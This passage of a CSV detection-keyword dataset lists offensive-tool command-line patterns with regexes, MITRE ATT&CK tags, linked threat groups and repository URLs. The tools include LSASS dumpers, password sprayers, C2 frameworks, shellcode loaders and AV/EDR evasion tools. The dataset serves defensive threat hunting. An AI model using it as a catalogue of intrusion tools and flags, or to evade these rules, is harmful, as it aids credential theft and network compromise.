this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","3071" "* --shadow-credentials --shadow-target *",".{0,1000}\s\-\-shadow\-credentials\s\-\-shadow\-target\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","3072" "* --sharepoint-replacement-exe-path *",".{0,1000}\s\-\-sharepoint\-replacement\-exe\-path\s.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","3077" "* SharpBuster.dll*",".{0,1000}\sSharpBuster\.dll.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","3078" "* SharpBuster.exe*",".{0,1000}\sSharpBuster\.exe.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - 
TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","3079" "* SharpC2*",".{0,1000}\sSharpC2.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","3080" "* -SharpChromium *",".{0,1000}\s\-SharpChromium\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into PowerShell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3081" "* SharpDoor.cs*",".{0,1000}\sSharpDoor\.cs.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is an alternative RDPWrap written in C# to allow multiple RDP (Remote Desktop) sessions by patching the termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","N/A","9","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","3082" "* SharpDoor.exe*",".{0,1000}\sSharpDoor\.exe.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is an alternative RDPWrap written in C# to allow multiple RDP (Remote Desktop) sessions by patching the termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","N/A","9","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","3083" "* -SharpDPAPI -Command *",".{0,1000}\s\-SharpDPAPI\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped 
into PowerShell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3084" "* SharpEDRChecker*",".{0,1000}\sSharpEDRChecker.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","3085" "* SharpEfsPotato*",".{0,1000}\sSharpEfsPotato.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","N/A","10","4","317","46","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z","3086" "* SharpElevator.exe*",".{0,1000}\sSharpElevator\.exe.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/SharpElevator","1","0","N/A","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","3087" "* -SharPersist *",".{0,1000}\s\-SharPersist\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into PowerShell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3088" "* SharpHose.exe*",".{0,1000}\sSharpHose\.exe.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows 
Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","N/A","N/A","10","4","312","62","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z","3089" "* SharpHound.html*",".{0,1000}\sSharpHound\.html.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","N/A","10","6","534","62","2025-03-10T07:32:22Z","2024-01-10T08:04:57Z","3090" "* SharpHound.ps1*",".{0,1000}\sSharpHound\.ps1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","3091" "* SharpPersistSD.dll*",".{0,1000}\sSharpPersistSD\.dll.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","3092" "* 
SharpRDPHijack*",".{0,1000}\sSharpRDPHijack.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","0","N/A","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","3093" "* SharpRoast.exe*",".{0,1000}\sSharpRoast\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","3094" "* -SharpShares *",".{0,1000}\s\-SharpShares\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into PowerShell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3095" "* -SharpSniper *",".{0,1000}\s\-SharpSniper\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into PowerShell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3096" "* SharpSocks *",".{0,1000}\sSharpSocks\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - 
T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","3097" "* -SharpSpray *",".{0,1000}\s\-SharpSpray\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into PowerShell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3098" "* sharpspray.exe*",".{0,1000}\ssharpspray\.exe.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","3099" "* -SharpUp -Command *",".{0,1000}\s\-SharpUp\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into PowerShell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3100" "* -Sharpview *",".{0,1000}\s\-Sharpview\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into PowerShell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation 
tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3101" "* -sharpweb -Command *",".{0,1000}\s\-sharpweb\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into PowerShell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3102" "* SharpWSManWinRM.vbs*",".{0,1000}\sSharpWSManWinRM\.vbs.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","0","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","3103" "* --shell tcsh exegol*",".{0,1000}\s\-\-shell\stcsh\sexegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3104" "* Shell3er.ps1*",".{0,1000}\sShell3er\.ps1.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","N/A","N/A","9","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","3105" "* --shellcode *",".{0,1000}\s\-\-shellcode\s.{0,1000}","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. 
shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/ins1gn1a/Frampton","1","0","N/A","N/A","N/A","1","75","19","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z","3106" "* --shellcode *--dc-ip *",".{0,1000}\s\-\-shellcode\s.{0,1000}\-\-dc\-ip\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","3107" "* --shellcode *--silent*",".{0,1000}\s\-\-shellcode\s.{0,1000}\-\-silent.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","3108" "* --shellcode --remoteinject*",".{0,1000}\s\-\-shellcode\s\-\-remoteinject.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","3109" "* shellcode_callback.exe*",".{0,1000}\sshellcode_callback\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","3110" "* 
shellcode_generate.py*",".{0,1000}\sshellcode_generate\.py.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","0","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","3111" "* shellcode2vba.py*",".{0,1000}\sshellcode2vba\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","3112" "* shellcode2vbafunc.py*",".{0,1000}\sshellcode2vbafunc\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","3113" "* shellcode-xor.py*",".{0,1000}\sshellcode\-xor\.py.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","3114" "* ShellGen.ps1*",".{0,1000}\sShellGen\.ps1.{0,1000}","offensive_tool_keyword","ShellGen","PowerShell script to generate ShellCode in various formats","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/ShellGen","1","0","N/A","N/A","7","1","41","10","2024-09-25T09:29:13Z","2024-08-22T13:32:06Z","3115" "* shellsilo.py*",".{0,1000}\sshellsilo\.py.{0,1000}","offensive_tool_keyword","shellsilo","cutting-edge tool that translates C syntax into syscall assembly and its corresponding shellcode","T1500 - T1588.002 - T1587.001 - 
T1546.015","TA0005 - TA0042","N/A","N/A","Resource Development","https://github.com/nixpal/shellsilo","1","0","N/A","N/A","6","2","132","13","2024-11-08T03:16:57Z","2024-03-08T02:04:04Z","3116" "* Shhhavoc.py*",".{0,1000}\sShhhavoc\.py.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","3117" "* shodan-api.nse*",".{0,1000}\sshodan\-api\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3118" "* Shoggoth.exe*",".{0,1000}\sShoggoth\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","3119" "* --show passwd*",".{0,1000}\s\-\-show\spasswd.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","#linux","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","3120" "* --show_invalid_creds*",".{0,1000}\s\-\-show_invalid_creds.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for 
Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","3121" "* --shtinkering*",".{0,1000}\s\-\-shtinkering.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","3122" "* --shuffle-users* --spray*",".{0,1000}\s\-\-shuffle\-users.{0,1000}\s\-\-spray.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","3123" "* sigflip.*",".{0,1000}\ssigflip\..{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","3124" "* sigflip.c *",".{0,1000}\ssigflip\.c\s.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","3125" "* SigFlip.exe*",".{0,1000}\sSigFlip\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","3126" "* SigFlip.PE*",".{0,1000}\sSigFlip\.PE.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","3127" "* sigflip.x64.*",".{0,1000}\ssigflip\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
